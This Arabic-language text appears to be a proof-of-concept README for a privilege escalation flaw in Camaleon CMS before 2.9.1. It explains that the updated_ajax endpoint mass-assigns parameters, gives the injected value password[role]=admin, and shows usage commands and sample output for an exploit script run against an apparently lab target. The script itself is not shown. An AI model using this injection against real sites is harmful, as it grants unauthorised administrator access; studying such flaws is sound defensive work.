
ثغرة تصعيد الصلاحيات في Camaleon CMS < 2.9.1.
ثغرة تصعيد الامتيازات في Camaleon CMS إصدار أقدم من 2.9.1. نقطة النهاية
updated_ajaxفيUsersControllerتستدعيparams.require(:password).permit!دون تصفية، مما يسمح بتعيين أي معلمة بشكل جماعي. يمكن لمستخدم مُصرَّح له بصلاحيات منخفضة تصعيد الامتيازات إلى مشرف عن طريق حقنpassword[role]=adminمع طلب تغيير كلمة المرور.
/admin/users/<id>/updated_ajax مع حقن password[role]=admin في معاملات كلمة المرور.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4
python3 exploit.py http://TARGET -u USER -p PASS
مثال:
$ python3 exploit.py http://facts.htb -u esteban -p password123
[*] Logging in as esteban...
[+] Logged in successfully
[*] User ID: 3, current role: editor
[*] Sending exploit payload...
[+] Privilege escalation successful! User is now admin.
[+] Login at http://facts.htb/admin with your credentials.